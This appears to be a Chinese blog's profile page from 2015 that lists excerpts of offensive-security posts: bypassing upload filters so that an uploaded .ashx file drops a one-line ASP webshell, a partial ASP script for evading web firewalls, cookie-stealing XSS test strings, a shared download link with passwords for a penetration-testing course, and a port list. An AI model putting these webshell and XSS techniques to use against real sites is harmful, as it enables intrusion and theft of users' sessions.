- 博客(7)
- 资源 (4)
- 收藏
- 关注
原创 另一种办法突破上传类型限制
发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:然后访问上传后的ashx文件,就会在同目录下生成一个root.asp的一句话木马,然后使用一句话木马客户端连接即
2015-11-27 12:29:30 1011
原创 绕过wed防火墙asp脚本
绕过web防火墙asp脚本是比较老的东西了,但是贴这吧,偶尔还会有些用特别是真对最近星外BT升级之后偶尔还是有些用的。队服务端view sourceprint?01 02 On Error Resume Next 03 set gl=server.CreateObJeCt("Adodb.Stream") 04 gl.Open 05 gl.Type=2 06 g
2015-11-27 12:26:55 543
原创 安全渗透测试实践高级系列教程
链接: http://pan.baidu.com/s/1gd89W6R 密码: p59m 解压密码:www.hegouvip.com 部分解压密码:dishiyiqihegoumima课程目录: 1 BT5简介 1-1本课程内容概述(14分4秒) 2 BT5的安装及基本配置 2-1BT5及VMWare tools的安装(19分41秒) 2-2Linux常
2015-11-27 12:11:37 2057
原创 一些系统漏洞
这 一 份 System Holes List 是 一 些 由 国 外 站 台 或 是 NewsGroup 收 集 的 一 些 资 讯 , 系 统 的 漏 洞 一 直 被 玩 家 抓 出 来 , 黑 客 们 也 经 由 一 些 系 统 的 漏 洞 入 侵 电 脑 , 如 果 你 是 一 个 ISP 或 你 有 机 器 连 接 到 InterNet 上 , 这 些 资 讯 你 就 非 读 不 可 了
2015-11-27 12:03:39 518
原创 XSS攻击测试语句
>alert(document.cookie) =‘>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert(‘XSS‘)%3C/script%3E alert(‘XSS‘) %0a%0aalert(\"Vulnerable\").jsp %22%3cscr
2015-11-27 12:01:32 1128 1
原创 端口大全
0=Reserved1=tcpmux2=compressnet3=compressnet4=Unassigned5=Remote Job Entr6=Unassigned7=Echo8=Unassigned9=Discard10=Unassigned11=Active Users12=Unassigned13=Daytime14=Unassi
2015-11-27 11:58:04 1134
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人